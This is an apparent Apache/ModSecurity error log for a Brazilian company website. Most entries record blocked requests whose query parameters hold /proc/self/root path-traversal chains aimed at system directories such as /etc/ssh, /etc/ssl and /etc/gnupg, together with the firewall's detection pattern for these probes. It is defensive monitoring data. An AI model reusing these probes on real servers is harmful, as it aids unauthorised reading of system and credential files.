[Thu Mar 19 02:39:58.865397 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:38992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMLgkwaGbbGflqUZBvcAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:40:04.143710 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:40:33.125800 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42300] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:40:44.784571 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:59546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMXAkwaGbbGflqUZBvmwAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 02:40:56.374407 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:49396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMaAkwaGbbGflqUZBvoAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:41:09.125867 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:41:20.809172 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.244.43:40018] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuMgNa6ubjKNq_cu4b5EgAAA1Y"]
[Thu Mar 19 02:41:37.307445 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:49872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMkda6ubjKNq_cu4b5GAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:41:45.145884 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43984] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:41:47.869565 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:60554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMm-oXxyEfFpUF8f_PgwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:41:59.634874 2026] [:error] [pid 19093:tid 140411699963648] [client 74.7.241.31:48266] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMp1_V7PWP6ixUYl55aQAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:07.137801 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44602] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:42:10.925523 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.241.31:44920] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMsl_V7PWP6ixUYl55bQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:24.454729 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.241.31:36880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMwF_V7PWP6ixUYl55dQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:29.129974 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45098] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:42:36.371195 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:54426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuMzNa6ubjKNq_cu4b5MwAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:45.835248 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.241.31:55542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM1f-YZRR_7pZ7nDJLGQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:52.146697 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:45566] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:42:56.170927 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:57514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM4AbLMZ6AikZjR9Ua8AAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:42:56.382102 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.241.31:57514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM4AbLMZ6AikZjR9Ua8QAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:04.113018 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:49070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM6Mdf6f5d65gmYZQwSAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:10.174842 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:53846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM7sdf6f5d65gmYZQwSgAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:15.585783 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:43:16.579099 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:53854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM9AbLMZ6AikZjR9Ua_AAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:21.563280 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.241.31:59480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM-RkFeYa1D6dYQnCp-AAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:25.384271 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:59488] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuM_eoXxyEfFpUF8f_PrQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:26.747105 2026] [core:alert] [pid 26799:tid 140411666392832] [client 57.141.18.87:46714] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:43:28.429207 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.241.31:35490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNAAbLMZ6AikZjR9Ua_wAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:31.173286 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.241.31:35492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuNA_u8EFLIOrSqIptZ5AAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:43:34.911533 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:35494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] 